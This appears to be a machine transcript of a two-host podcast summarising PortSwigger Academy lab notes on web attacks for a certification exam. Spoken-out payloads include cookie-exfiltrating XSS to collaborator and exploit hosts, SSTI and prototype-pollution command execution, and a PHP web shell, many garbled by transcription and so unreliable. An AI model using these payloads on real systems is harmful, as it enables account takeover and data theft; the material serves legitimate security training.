Welcome to the deep dive. Today, we're really diving deep into the intricate world of web security vulnerabilities. Our mission for you listening is to sort of fast track your understanding of web application security. We're distilling insights from really extensive study notes for a top-tier cybersecurity certification. Think of it as your shortcut to being genuinely well-informed, hopefully without all the usual information overload.
That's absolutely right. Yeah, we're here to cut through that complexity. We want to unveil the core insights, maybe some surprising facts, and definitely the practical applications of these vulnerabilities. Our goal is to give you a pretty comprehensive understanding of how ethical hackers actually identify and exploit common web app flaws, transforming what might seem like these really daunting concepts into actionable knowledge you can grasp.
And when we say extensive study notes, we really mean it. Our source material for this deep dive is, well, it's vast. We've got detailed analyses from over 100 Portswigger Academy labs, various industry security playbooks. We're talking everything from the very first steps an attacker takes, like initial reconnaissance, all the way through to, advanced data exfiltration techniques. It's going to be quite the journey.
Yeah.
So let's kick things off right at the beginning. Imagine you're an ethical hacker starting a time-limited engagement. What are those crucial first steps? Just to get a lay of the land, understand the target.
Right, okay. The initial phase is really all about enumeration, mapping out the application. This usually starts with very deliberate scanning. One key technique is focus scanning. That's where you really zero in on specific insertion points in requests. For instance, our sources show how a scanner might flag an XML injection vulnerability on, say, a store IP parameter.
Right.
But the real insight isn't just detecting it. It's realizing this can be leveraged to read sensitive files. Like, you could potentially grab home Carlo's secret by injecting specific XML entities, like X-include.
Wow, okay. That sounds like a very precise hit, like knowing exactly where to tap. What about scanning non-standard data structures? What does that actually mean in practice?
That's about looking for vulnerabilities in, well, less obvious places. Maybe it's a hidden JSON object somewhere, or an unusual parameter you wouldn't normally expect. For example, if you spot a potential insertion point, you might try injecting something like a specific XSS payload, something crafted like asv load fetch, oastify.comn, encode URI component, current user logging cookie tech-impart.
Okay, that looks complicated. What's it doing?
Yeah, it looks messy, but it's designed to trigger cross-site scripting, XSS, to steal an admin user's cookies. It sends them off to your specialized listener service, what we often call a collaborator service. Think of the collaborator as like your personal internet postbox. It lets you detect these out-of-band interactions from the target server when it calls back to you.
Ah, so the application actually reaches out to your server, confirming the vulnerability. That's pretty clever. So once you've got those initial hints, how do you find the hidden corners? What does content discovery look like?
Content discovery is absolutely crucial.
Yeah.
It involves actively fuzzing web directories and files. You'd use tools like FFUF, maybe Burp's content discovery feature, along with good word lists. Beyond that, you look for hints developers might have accidentally left behind. Files like robots.txt or sitemap.xml, they can often reveal paths to hidden admin panels or, forgotten dev pages. And here's a surprising one. Sometimes we even look at local Git repository branches. Tools like Git-Cola can let you literally undo last commit. You can browse through the development history, potentially pulling out sensitive info, maybe even admin passwords from diff windows before they were supposedly removed.
Wow, really? That's digging deep.
Oh, yeah. And of course, always meticulously checking the source code for developer comments. They might reveal hidden files or paths. It's often a goldmine for forgotten secrets. Hashtag cross-site scripting, that many faces.
It's pretty remarkable how many layers there are to just finding things. Now, once you've mapped out some weaknesses, the path often leads straight to one of the web's most, let's say, notorious residents. Cross-site scripting, or XSS, you mentioned earlier, it's way more than just those simple pop-up alerts, right?
Absolutely. Yeah, XSS is incredibly pervasive. It shows up in so many forms. Let's start with DOM-based XSS. This happens when client-side JavaScript takes data from an attacker-controlled source, often something in the URL, right? And then it passes that data to what we call a sink.
A sink.
Yeah, a sink is basically a JavaScript function or maybe a DOM object that can execute code dynamically. Common indicators you look for in the source code, things like document.write, window.location, or the dreaded evil.
So the key is finding where the application kind of drinks the user's input without cleaning it up properly first. How do you find and exploit these specific sinks?
Well, Tools like the DOM Invader plugin are invaluable here for detection. They let you set a canary that's a unique string that helps you trace exactly where your input ends up within the DOM. For example, we've seen vulnerable AngularJS expressions where even seemingly safe encoded characters can be bypassed, triggering a pop-up with a payload like $.constructor. Another classic is exploiting document.write syncs. If user input from, say, location.search ends up inside a select tag, you could potentially steal cookies with a payload like select script document.location, https://sfy.com.demsss plus document.cookiescript. What's really fascinating, though, is how web messages, especially those processed by JSON.parse from post-message calls, can be exploited. Imagine you construct an HTML page on your exploit server. When a victim opens it, it uses an iframe to send a crafted JavaScript URL, something like javascript.document.location, https://astify.tcom.tc plus document.cookie. That effectively siphons off their cookies. Whoa. The key insight is that even seemingly secure communication channels can be twisted if the parsing isn't absolutely watertight. That's quite clever, using a different channel to get the same result. Okay, beyond DOM-based, what about general XSS techniques? And how do ethical hackers get past those web application firewalls, the WAFs? They seem pretty tough. Right, WFs. When they're blocking common XSS payloads, the art really lies in identifying allowed tags and events. Sometimes the WEF is laser-focused on blocking script tags, but completely different markup, like SVG, might just sail right through. For instance, a payload like svganimate transform on begin document.location, https://osfy.com.cookies plus document.cookie might still steal cookies because the WEF just wasn't expecting SVG.
Interesting.
Another evasion tactic is the assignable protocol method. Using location.protocol JavaScript, combined with a new line character, P0A, can sometimes execute code where JavaScript. URLs might normally be blocked. You might also find success just by breaking out of JavaScript string variables. For reflected string XSS, something simple like script document.location, https://osfy.com.cookie plus document.cookiescript could be enough to escape the string context and run your own script. And sometimes, honestly, the simplest bypass works. If you get a tag is not allowed error, just changing the case of the tag, like script, can actually fool less sophisticated filters.
Not really. Just changing the case.
Yeah. The core principle is that filters are almost always built with specific patterns in mind. The real art of bypass is finding the edge cases, those unexpected character encodings, or less common HTML tags that the filter developer just didn't anticipate.
So it's a constant game of finding the parser's blind spot. Makes sense. What about XSS that sticks around?
That's stored XSS. This is when your malicious payload gets saved on the server itself, maybe in a blog comment section or a product description field, something like that. Then it gets delivered to other users every single time they visit that affected page.
Ooh, that sounds dangerous.
It is. These are particularly dangerous because they don't require any direct interaction from the victim beyond just, viewing the page. Payloads might use MNG tags like MNG src1 honor window.location https://exploit.net cookie plus document.cookie, or maybe the fetch API, something like script fetch, https://exploit.net, mode.cost, mode.nocourts, body.document.cookie, script, both silently siphon off victim session cookies. And it's crucial here to remember the HTTP only flag on cookies. That little flag basically tells the browser, hey, JavaScript can't touch this cookie. Which is why XSS, as powerful as it is, typically can't steal cookies if HTTP only is set correctly. That forces attackers to find other ways to leverage the XSS. Tag web cache poisoning.
Okay, that's a lot on XSS. It really shows how many different angles there are. Moving on, though, how can caching something that's meant for speed and efficiency actually be turned against an application through web cache poisoning?
Right, caching. When it's misconfigured, it can be a huge vulnerability. The core insight here is that caches often rely on certain keyed headers to decide if a response can be served from memory.
Yeah.
If an attacker can manipulate an unkeyed header, one the cache ignores when deciding what to store, they can inject malicious content into the cache response.
Yeah.
For example, by manipulating headers like xforwarded host, they could redirect resources, like a harmless tracking.js script, to an attacker-controlled server. And then subsequent victims who hit that poisoned cache get served the attacker's malicious script, potentially stealing their cookies. Paraminer is a really key tool here for finding these unkeyed headers.
So the cache thinks it's serving one thing based on the key, but the backend actually processes the unkeyed header differently, leading to the attacker's content being served to innocent users.
Precisely. Yeah, it's like Two systems reading the same request but interpreting its boundaries differently. Take an unkeyed UTM content parameter. If it's excluded from the cache key, an attacker can inject malicious code into it. Or, in a technique called cloaking UTM content, appending a semicolon to the parameter value can effectively make additional parameters seem like part of UTM content to the cache. This allows for injection, potentially leading to a cached response, serving nasty content from the attacker's server. It's subtle, but potentially devastating. Hashtag host header attacks.
Fascinating how a subtle difference in interpretation can be weaponized like that. That level of detail is really something. But sometimes it's not about these parsing nuances, is it? Sometimes it's just simpler. Let's talk host header attacks. What are they and what can they achieve?
Right. Host header attacks primarily involve altering the host header in an HTTP request. This header normally just tells the server which website you're trying to reach. The trick is, in some setups, this header is used for various internal decisions. Attackers can try to spoof IP addresses, often using headers like xforwarded for or xforwarded host to bypass things like IP-based brute force protection.
How does that work?
Well, imagine a system bans your IP after 5 failed logins. If you can spoof a different IP with each attempt, maybe using xforwarded for, you bypass that limit entirely. Even more impactful, sometimes a manipulated host header can redirect a password reset link to an attacker-controlled server. That can lead straight to account takeover.
So you're basically tricking the server into thinking the request came from somewhere else, or that it should send sensitive info, like that reset link, somewhere else entirely.
Exactly. And what's particularly devious is exploiting the host connection state. This can enable something called routing-based SSRF, server-side request forgery. By sending grouped requests in a specific sequence using a single connection, keep alive, you might bypass host header validation that would normally block direct access to internal services.
Like what kind of services?
Like maybe you could access an admin-delete endpoint directly on localhost, something that should be completely off-limits to external users. It's a deep technical vulnerability that relies on a very specific interaction between the client, maybe a proxy, and the backend server. Hashtag HTTP request smuggling.
Routing-based SSRF. Wow. Okay, this next one sounds like a truly covert operation. HTTP request smuggling. What exactly is that?
Yeah, HTTP request smuggling happens when there's a desynchronization between two servers, typically a front-end proxy or load balancer and a back-end application server. They disagree on how to interpret the length of an HTTP message. This often happens because one server prioritizes the transfer encoding header while the other relies on content length, or vice versa. Or sometimes they handle both, but differently.
And that disagreement, that's the opening.
That's the opening. This mismatch allows an attacker to inject or smuggle a malicious request inside a seemingly legitimate one. The backend server then processes this smuggled request, often bypassing security controls that the front end might have applied.
So you're basically queuing up a hidden request that the server processes without even realizing it's malicious. It's like slipping a secret note into a pile of regular mail.
Precisely. A classic example is TECL dual chunk. Here, transfer encoding is used with a carefully crafted hexadecimal chunk length, but the backend trusts content length. This lets you smuggle a malicious second request, maybe an XSS payload hidden in the user agent header. That smuggled request then affects the next user who hits that desynchronized connection, potentially capturing their cookies.
Nasty.
Very. Other variations like CLTE multicase can be used to bypass path blocking for sensitive areas. Say admin is blocked by the front end. You might smuggle an admin request inside another one. It looks okay to the front end, but the back end sees and processes the hidden admin request. It's all about exploiting that parser desynchronization. And this could even extend to HTTP2 with techniques like h2.te desync, leading to response queue poisoning, where ambiguous request lengths can lead to stealing admin session cookies. Hashtag brute force.
HTTP request smuggling is incredibly intricate stuff, but sometimes, like you said, it's just about trying every key, isn't it?
Yep.
Tell us about brute force attacks. Still relevant.
Oh, absolutely. Brute forcing, while maybe seen as basic, remains highly effective, especially when you combine it with clever bypasses. We see it with things like stay logged in cookie brute forcing. If those cookies contain predictable values, maybe MD5 hashes or base64 strings, they can sometimes be stolen and then cracked offline using rainbow tables or just raw compute power.
And online.
For online brute force, a common defense is like a 30-minute IP ban after a few failed logins. The bypass, again, spoofing IP addresses, maybe via the xforwarded for header. You cycle through different IPs, making each failed login attempt look like it's coming from a new source, bypassing the rate limit. Then you can use techniques like the pitchfork attack in Burp Intruder, maybe leveraging subtle response timing differences to identify valid usernames even if you don't know the password yet. And something often overlooked is subtly invalid login. This technique involves meticulously looking for tiny differences in error messages. For example, does the server say invalid username or password, or does it say incorrect password? Or maybe one error message has a period at the end and the other doesn't.
Seriously, that small a difference.
Yes, those subtle variations can reveal whether the username you tried was valid, even if the password was wrong. It's a crucial reminder, especially in exam scenarios, that Carlos or some default user isn't always the only target. You have to look for any subtly different message that indicates any valid account. Every detail matters. #tag authentication.
Beyond brute force, what are some other common authentication-related flaws, ways to get that initial foothold?
We frequently find business logic flaws, especially within account registration features. A surprising one involves email truncation. Imagine an application limits the email prefix to, say, 200 characters, but the database field allows 255. An attacker might register admin at example.com, followed by a very long string. If the application truncates that before that symbol to exactly 255 total characters on the backend, well, they might end up effectively registering or controlling admin at example.com.
That's sneaky.
It's a subtle but potentially powerful flaw. Another common bypass involves dealing with anti-brute force tokens. If the login form uses a random token on every POST request to prevent automation, you can use something like the auth token bypass macro in Burp Suite. You configure Burp to automatically grab the fresh token from one request and inject it into the next attempt in your intruder attack, making brute forcing feasible again.
All right, so let's say you've managed to secure that initial foothold. You're in the door somehow. Now, the natural next step for an attacker is usually to gain more power, right? Escalate privileges, ideally take over accounts. How do they typically do that?
Yeah, escalating is key. This is where cross-site request forgery, or CSRF, often comes into play. CSRF basically tricks an already authenticated user into performing actions they didn't intend to. Imagine you're logged into your bank. An attacker sends you a malicious link, maybe in an email or on another site. If you click it, that link could, without you explicitly clicking anything on the bank site, force your browser to submit a request to the bank like changing your registered email address.
And if they change the email?
Then they can trigger a password reset sent to their email address. Boom, account takeover.
Okay, so how do you bypass CSRF protections? Servers usually check things, right?
They do, but the checks can be flawed. For referer validation CSRF, where the server checks the referer header to make sure the request came from its own site, well, sometimes you can bypass that. You might be able to use JavaScript's history.pushState to manipulate the URL in the browser bar, then append the target domain to your exploit URL, like target.net. This can trick a weak referer check.
Clever.
Or, if the validation simply checks if the referer header present at all, you can use a meta tag. Meta name referrer content, no referrer on your exploit page. This tells the browser not to send any referer header, which again might fool the server into thinking the request is local or somehow trusted.
What if the CSRF token itself is the problem, not just the referer?
Right, tokens can be flawed too. If the CSRF token is tied to a non-session cookie, like maybe a last search term cookie, well, that's exploitable. You might be able to inject a new cookie value containing your CSRF token using set cookie headers injected via another parameter, like a search query. For example, search test for 00 to user 070 set cookie. Current user CSRF key EY, 3% 26, 20 stay or same site, none.
Wow, injecting cookies via search parameter.
Yeah, it happens. Sometimes the simplest bypass works. The CSRF token present vulnerability. This is where merely deleting the CSRF token parameter from the request entirely causes the server to accept it. It's a basic oversight, but surprisingly common.
Just delete it.
Just delete it and hope for the best. Even modern defenses like same-site cookie protections can sometimes be bypassed. For instance, a same-site lax bypass might exploit an automatic OAuth login flow. You get the victim to visit the social login page, which refreshes their session cookies, now potentially usable cross-site briefly, and then you immediately submit the malicious email change request before the session state settles down. It's timing dependent, but possible. #tag password reset flaws.
Broken password resets feel like a classic vulnerability. What are some ways those get exploited for privilege escalation?
Oh yeah, password reset flaws are a very common vector for escalation. One example is refresh password broken logic. Imagine a forgot password page sends a token. but the actual password change form includes a hidden username field that isn't properly validated against a token. If you can intercept that final request, maybe delete a temporary token parameter if one exists, and just change the hidden username field to administrator or Carlos, you might just reset their password without needing their specific token. Another common flaw: the application simply doesn't require the current password when setting a new one. This means if an attacker can somehow intercept or craft the set new password request, maybe via SSRF or another flaw, they can change any user's password just by setting the username parameter to administrator, for example. And then there are the really tricky ones like time-sensitive password tokens. If an application uses, say, just the current timestamp, down to the second, to generate reset tokens, what happens if you request resets for two different users, say Carlos and administrator, at almost the exact same instant?
Oh, they might get the same token.
Exactly. Due to the timestamp collision, they might receive duplicate matching tokens. The attacker requests a reset for their own account and the admin account simultaneously. They get their token, and because it matches the admin's token generated at the same second, they can use their token to successfully reset the administrator's password. It's a race condition leading to complete compromise. #tag SQL injection.
Okay, let's tackle one of the giants. SQL injection. SQL. Injecting code where it absolutely shouldn't be. How does that work at a high level?
SQL injection allows attackers to basically insert malicious SQL queries into application input fields, parameters, cookies, you name it. This bypasses the intended logic and lets them interact directly with the database. We typically start to identify SQLs by simply adding single quotes or double quotes to parameters or cookie values. If the application breaks and spits out a database error message, that's a strong indicator you've broken the SQL syntax. It's like gently poking a system to see if it leaks database errors.
Okay, but what if there are no error messages? The blind scenario.
Right, blind swell. If no errors appear, we might resort to blind time delay swell. For a PostgreSQL database, for example, this involves injecting payloads with conditional logic and a sleep command like select case when one key swell, then pg sleep 0, then pg sleep 0, n, actually else pg sleep 0. We ask the database a true-false question. If the answer is true, we tell it to pause for, say, 7 seconds. By carefully changing the condition, like is the first letter of the admin password A, and observing those time delays in the response, we can painstakingly extract information, character by character.
Wow, that sounds tedious.
It can be, which is why tools like Burp Intruder using a cluster bomb attack type are often used to automate this process of asking questions and measuring response times.
So even with basically no direct feedback, you can still figure things out just by timing how long the server takes to respond?
Exactly. Another advanced technique is blind SQL with out-of-band data exfiltration. This often combines SQL with XXE XML external entity injection. You craft a SQL query that extracts the data you want, like the admin password, and then uses database functions to make an HTTP or DNS request containing that data back to your collaborator server. For example, using extract value within XML and Oracle can trigger this. Even if there's truly blind SQL, no evasion, no errors, no time delays, these out-of-band techniques can still confirm the vulnerability and ultimately get you the data. For manual SQL, the syntax varies depending on whether it's an Oracle or non-Oracle database, like PostgreSQL, MySQL, MS SQL. You use different union select statements to retrieve table names, e.g. from all tables or information schema.tables, then column names, information schema.columns, and finally dump the data itself. We often concatenate values like username and password to pull back multiple pieces of data in a single column if the union statement requires it.
And automation.
And of course, for automated exploitation, SQL Map is the go-to tool. It's incredibly powerful. It can identify the injection point, figure out the database type, and extract data very quickly with specific command line flags.
Right.
#tag JSON Web Tokens, JWT manipulation.
Okay, shifting gears. JWTs, JSON Web Tokens, are everywhere now for authentication. How do ethical hackers actually bypass those crypto signatures? It sounds like it should be cryptographically secure.
JWTs are fundamental for authentication and access control, but yeah, their security really hinges entirely on proper validation and especially strong key management. Flaws here are common. A classic one is JWT authentication bypass via JWK, JSON Web Key header injection. Here, an attacker generates their own new RSA key pair. They take a valid JWT, change the subject claim to administrator, and critically, they embed their own public key directly into the JWT header using the JWT parameter.
Wait, they put their key in the token.
Exactly. If the server is misconfigured to trust the key provided within the JWT header parameter, it might mistakenly validate the signature using the attacker's public key. It thinks it found the key it needed, even though the attacker supplied it.
That's bold.
It works surprisingly often. JWP weak secret vulnerabilities are also really common. If the SQL key used to sign symmetric JWTs, HS2506, is weak or guessable, it can be brute forced using tools like hashcat-m16500. You just feed it a word list and see if you get lucky. Another interesting one. If the KID, key ID parameter, in the JWT header is used by the server to fetch the verification key from the file system, you might get JWT authentication bypass via KID header path traversal. By setting the KID to a path like .jecnonul, you might trick the server into using an empty or predictable key for verification, again allowing signature bypass. The core issue is often the server blindly trusting parameters inside the JWT header itself. Tag prototype pollution.
This next one sounds a bit like, I don't know, injecting new DNA into an application. What exactly is prototype pollution?
Yeah, that's not a bad analogy. Prototype pollution happens when an attacker finds a way to add arbitrary properties to global JavaScript object prototypes. Remember that in JavaScript, objects inherit properties from their prototype. It's like a blueprint. If an attacker can inject a property into this fundamental proto-blueprint, then potentially any new object created later that inherits from that prototype will also get the attacker's malicious property.
Then that leads to...
Well, it can lead to serious consequences. On the client side, it can enable DOM XSS. On the server side, especially in Node.js applications, it can potentially lead to remote code execution. For client-side proto, exploitation often involves getting the victim to visit a specially crafted URL, something like https://target.net, proto hit callback alert, part28 document.cookie29. This injects a property that later gets executed as code, maybe triggering DOM XSS. For server-side proto aiming for privilege escalation, you might inject proto properties directly into JSON data sent in post requests. For example, sending proto.home in a user profile update could potentially elevate the attacker's privileges if the backend code improperly merges this object. The subtle power here is manipulating the fundamental structure of how objects behave in the application. #tagged API testing vulnerabilities.
APIs are the absolute backbone of almost every modern web app now. What are some common, maybe surprising security flaws you find in them?
Yeah, APIs are everywhere, and they often have hidden or just poorly validated parameters that attackers love to exploit. A really significant one is called mass assignment vulnerability. This happens when an API endpoint accepts a large JSON object for, say, updating a user profile or creating an order. If an attacker adds hidden JSON parameters to that object parameters the developers never intended to be user editable, like maybe admin, true, or administrator, the API might blindly process them if it just maps the entire incoming JSON to an internal object.
And suddenly you're an admin.
Potentially, yeah. Or in an e-commerce API, maybe you could make products free by adding discount 100 or price to a purchase request. It's like asking for a sandwich and accidentally getting the keys to the restaurant.
Okay, what else?
Another tricky one is API reset password parameter pollution. Imagine a password reset endpoint that takes the username and maybe sends a POST request. By adding random, seemingly junk parameters to that POST request, like an XY and foobar, URL encoded, of course, you might cause the server to respond with an error message that leaks information about other hidden parameters it was expecting but didn't receive.
Leaking parameter names.
Exactly. It might reveal it was also expecting something like reset token or security answer. This subtle information disclosure caused by parameter pollution can then guide an attacker on how to actually steal password reset tokens or bypass security questions. #tag access control flaws.
Okay, so what if the doors seem locked, but maybe the keys are visible or the bouncer just isn't paying close attention? Tell us about access control flaws.
Access control flaws are all about bypassing restrictions on what a user is supposed to be able to do or see, often to gain higher privileges. A really straightforward example is privilege escalation via JSON role-light. This just involves fuzzing systematically trying different values for a parameter like role-light in a JSON request body. So instead of the normal role-light 1 for a regular user, you might just try role-light 2, role-light 42, just incrementing or trying common admin IDs until you stumble upon one that grants administrative access. It's surprisingly common for this not to be properly validated server-side.
Just guessing numbers.
Pretty much.
Yeah.
Sometimes the flaw is more subtle, like in the application's logic flow, authentication bypass via flawed state machine. This can happen if an application has, say, a multi-step login or registration process. By perhaps intercepting and dropping a specific HTTP request in that sequence, like maybe a GET request for a page asking, please select a role, before it's actually presented to the user. You might confuse the backend.
How so?
The backend might not handle that missing step gracefully and could default to assigning an admin role, granting you unintended access. It's like interrupting a setup wizard and having it default to the most powerful configuration. Another technique is URL-based access control circumvented, using special HTTP headers like xOriginalURLAdmin or xRewriteURLAdmin. These headers are often used by reverse proxies, but if the backend application trusts them implicitly, an attacker can use them to bypass front-end access controls and directly access restricted paths like admin. #GraphQL API exploitation.
GraphQL. It's definitely the newer kid on the block for APIs, gaining a lot of traction. How do ethical hackers approach and exploit GraphQL APIs specifically?
Right, GraphQL. Its flexibility is great, but it can sometimes unintentionally expose its full capabilities if not secured properly. To identify GraphQL API endpoints, you often start by sending universal queries like apply.query_query_typename or graphql.query_typename to common paths. Once you find an endpoint, the next step is often to attempt a full introspection query. If introspection is enabled, which it often is by default in development, sometimes forgotten in production, it basically maps out the entire API schema for you.
The whole thing.
Yeah, it reveals all available queries, mutations, which modify data, data types, everything. It's like asking the API, hey, show me absolutely everything you can possibly do. And this introspection can directly lead to finding vulnerabilities like accidental exposure of private GraphQL fields. For example, a GET user query discovered via introspection might reveal sensitive fields that were never intended for public access, internal user IDs, maybe email addresses, sometimes even hashed or rarely plain text passwords if things are really bad.
Wow. Okay. What about things like brute force?
GraphQL also presents interesting ways around typical protections. For instance, bypassing GraphQL brute force protections that rely on simple request rate limiting. Instead of sending one HTTP request per password attempt, you can craft a single, large GraphQL query that contains multiple login attempts embedded within it. You can generate this programmatically, trying maybe hundreds of passwords in one go. To the rate limiter, it looks like just one complex request, but the GraphQL server processes each login attempt inside.
That's clever, sneaking multiple tries into one request.
Exactly. It bypasses naive rate limiting effectively. #CHAG cross-origin resource sharing misconfigurations.
We all know sharing isn't always caring, especially in web security. How do CORS misconfigurations, cross-origin resource sharing, lead to vulnerabilities? How can they expose sensitive data?
Yeah, insecure CORS configurations can basically punch holes in the browser's same origin policy, allowing malicious websites to access sensitive data from your application that they shouldn't be able to touch. It's like leaving your front door unlocked and telling the browser it's okay for strangers to peek inside.
How does that happen?
A common one is CORS vulnerability with trusted insecure protocols. Let's say you test by sending a request with an origin header like origin.http.subdomain.target.net. If the server responds by reflecting that exact origin in the access control allow origin header, and there happens to be an XSS vulnerability on that http.subdomain, then an attacker can use JavaScript hosted on that insecure subdomain to make authenticated requests back to your main secure domain and steal sensitive data, like API keys or session info returned in AJAX responses.
Because the main site trusts the insecure subdomain.
Precisely. Another scenario is the CORS vulnerability with trusted null origin. An attacker sends a request with origin.null. If the server reflects access control allow origin.null back, this is often exploitable. The attacker can then create a malicious page using a sandbox iframe with the CIRDoc attribute. Requests originating from such an iframe have a null origin. This allows their malicious JavaScript inside the iframe to make authenticated AJAX requests to your application and exfiltrate sensitive data, like maybe account of API details containing administrator session tokens. The core issue is whitelisting insecure origins, like HTTP subdomains, or ambiguous origins like null, which allows browsers to relax their security policies in ways that enable data theft.
Okay, we've laid the groundwork, we've maybe climbed the privilege ladder. Now we're at the final stage, sealing the deal, getting the goods, stealing sensitive information. Let's start with the dangers when applications process XML external entity, or XXE injections.
Right, XXE. These vulnerabilities typically pop up when an application parses XML input without properly disabling external entity processing. Think file uploads, like docx, SVG, or maybe API endpoints that consume XML. To identify XML attack surface, even in requests that don't look like they use XML, you can sometimes try just adding something like 26entity, which is an entity, to a parameter value. If the server throws an XML parsing error, you found a potential entry point.
Okay.
Found an entry point, then what?
Once identified, you can try to exploitxinclude to retrieve files. This involves injecting an xinclude statement, which is part of the XML standard, to just directly include and display the contents of local files, like etc password or maybe home kernel secret.
What if you can't see the output directly? Blind XXE.
Yes, exactly. For exploiting blind XXE to exfiltrate data using a malicious external DTD, things get more interesting. You host a malicious DTD, document type definition file, on your own server. Your XXE payload then references this external DTD. Inside the DTD, you define entities that first read the target file, example, home kernel secret, and then make an out-of-band HTTP request or DNS lookup containing the file's contents back to your collaborator server. It silently sends the data home to you.
Clever.
If even that doesn't work, maybe outbound HTTP is blocked, you can try exploiting blind XXE to retrieve data via error messages. Here, you craft the external DTD in a way that tries to load a non-existent file, but the path of that non-existent file includes the contents of the file you actually want to steal. The resulting error message might then leak the file contents back to you. It's about making the application talk back in ways it shouldn't, revealing secrets in its complaints.
So making the application basically scream out its secrets through an error message or phone home to you.
Exactly. And you can combine XXE with other attacks, too. For example, SQL injection with filter bypass via XML encoding. If a web app takes XML input that eventually feeds into a SQL query, but it has filters against common SQL characters, you might be able to encode your SQL payload using XML entities like hex encoding at hex entities one union select at hex entities to bypass the filter. Burp's hackverter tool is great for this.
Combining vulnerabilities.
Yeah. XXE can also be used to perform SSRF attacks. You inject an external entity that tells the server to make a request to an internal service, like http.localhost.8088admin or http.169.254.169.254 latest metadata in cloud environments. And surprisingly often, you find exploiting XXE via image file upload, specifically SVG images, since SVG is XML-based. You craft an SVG image that contains an XXE payload, upload it as, say, a profile picture, and when the server processes it, maybe to resize it, the XXX server-side request forgery, SSRF.
Okay, this next one sounds like making the server itself betray its own network. What is server-side request forgery, or SSRF exactly?
SSRF forces the server-side application itself to make HTTP requests to unintended locations. Basically, you trick the server into becoming your proxy to access resources it can reach, but you can't directly, like internal network services, loopback interfaces, 127.0.0.1, or even other internet-facing systems that might trust requests coming from the application server's IP.
How do you bypass filters? They must try to stop this, right?
Oh, they try. If there's an SSRF with blacklist-based input filter, maybe it blocks strings like 127.0.1 or localhost, you can often bypass it using alternative representations or encoding. WRL encoding characters can work, like http.127.1% 2561 dmin to encode the admin part. Turns in 25 is the URL encoding for percent. Sometimes using decimal or octal IP representations works. There are many bypass tricks. Sometimes the flaw is in how the request itself is parsed. SSRF via flawed request parsing. Maybe you can provide an absolute URL in the GET request line, like get https.target.net middle HTTP 1.1, but then set the host header to an internal IP, like host 192.168.991.114. A confused server or proxy might route the request based on the host header, hitting the internal target despite the URL.
That's tricky. Where else does SSRF pop up?
Surprisingly often in places you wouldn't expect, like SSRF, inside HTML to PDF conversion services. If an application lets you submit HTML content, maybe for generating invoices or reports, and converts it to PDF on the server, you can inject HTML tags that cause the server-side PDF renderer, which is often a headless browser, to make requests. Think of frame src file.htc_passwd, or maybe even using JavaScript via XML HTTP requests within the HTML to read local files or ping internal endpoints during the PDF generation process. The server effectively attacks itself while trying to render your PDF. Hashtag server-side template injection, SSTI.
Okay, when design templates become a backdoor, that sounds like server-side template injection, SSTI. How does that work?
SSTI happens when user input is dynamically embedded into server-side templates, like those used by frameworks such as Jinja 2, FreeMarker, ERB, Handlebars, etc., without proper sanitization. If the application just concatenates user input into a template string, the template engine might interpret that input as template code rather than just literal text. You often identify it by trying simple template expressions like or 77 in input fields. If the application responds with 49 instead of the literal string, you likely have SSTI.
And once you know it's vulnerable.
Once identified, you need to figure out which template engine is being used, often by inducing specific error messages with slightly broken syntax. Then, you use payloads tailored for that specific engine. For example, in Tornado, Python, you might use 2% MOS systems, cat% import OSIS system, cat porting home Carlos secret. In Django, Python, maybe tat% debug% secret key to leak info. In FreeMarker Java, something like hashtag assignx freemarker.template.utility.execute.new, or in ERB, maybe stranded system, cat home Carlos secret centered. The core idea is you're giving the template engine direct instructions, and it's obediently carrying them out on the server, letting you run commands or access sensitive data. Hashtag server-side prototype pollution, SSPP.
This sounds like a really deep technical vulnerability. Server-side prototype pollution. You mentioned prototype pollution earlier for the client side. How does it work on the server?
Right, SSPP primarily affects Node.js applications, especially those using libraries that unsafely merge user-controllable input, often JSON, into server-side JavaScript objects. Similar to the client-side version, the goal is to inject properties into the global object.prototype, proto. You might identify SSPP by injecting something benign first, like proto, some random property test value, and seeing if you can observe that property appearing unexpectedly elsewhere in the application's behavior or responses. Maybe proto-JSON spaces 10 makes JSON output formatted differently.
Okay, you've confirmed it. How do you get code execution?
Achieving remote code execution, RCE, often involve targeting specific properties that Node.js or its libraries use internally. A common target is the exacarglyv property, which can specify command line arguments for child processes. So you might inject something like proto exacarglyv evil, require child process.exesync, rmhomecarlosmoral.txt. This injected property might then get picked up later when the application spawns a new Node.js process, maybe for a background task or an admin panel maintenance job. That new process then executes your injected code. It's about poisoning the environment for future code execution. Hashtag tag file path traversal, LFI local file inclusion.
When files aren't where they seem, that sounds like file path traversal, or LFI, local file inclusion. How do these attacks work, and what are some ways attackers get around defenses?
File path traversal attacks allow an attacker to read arbitrary files on the server file system by manipulating file path parameters. Instead of accessing the intended file, like var_w_images logo.png, they use sequences like .. to navigate up the directory tree and access files outside the web root, like XSS password or application configuration files.
What about filters? Hunt seems easy to block.
It is, but there are many bypass techniques for naive filters. Using absolute paths, etc. paths a day, might work if the application just prepends a base directory without proper validation. If the filter just removes non-recursive stripping, you can use sequences like the inner dot gets removed, leaving book dot. Superfluous URL encoding, 0.252pf or break 252f is double encoded, can trick some decoders. Null byte bypass, etc. pass wtd per 000.jpg used to work well to terminate the file name before an expected extension, though less common now. And sometimes even Windows path syntax, while .ini works on misconfigured Linux servers or vice versa. Tools like .pwn or 403 bypasser automate trying these tricks. We've also seen cases labeled admin portal files, where maybe an image loading function uses a parameter like imagefile.secret.txt and is just vulnerable to basic traversal. And sometimes you need to bypass authorization too. Path traversal oft bypasses might involve adding headers like xcustomIP authorization, 127.0.0.1, or xforwarded4.localhost. If the application trusts these headers to determine if a request is internal, it might grant access to sensitive files that would normally require admin authentication. Hashtag file upload vulnerabilities.
This is always an intriguing scenario. Uploading a simple picture, but somehow getting a shell, essentially full remote control of the server. Tell us about file upload vulnerabilities.
Yeah, file upload functions, like for avatars or document sharing, can be a direct route to RCE, if not secured perfectly. The goal is to bypass security controls and upload a file containing malicious code, a web shell, and then get the server to execute it.
What does a basic payload look like?
For a PHP server, a very basic web shell to just read a file might be PHP echo phylegic contents home Carlos secret. A more functional shell would use system or pass through to execute arbitrary OS commands passed via URL parameters. The real trick is getting the server to treat your uploaded file as executable code.
How do attackers manage that? Bypassing checks?
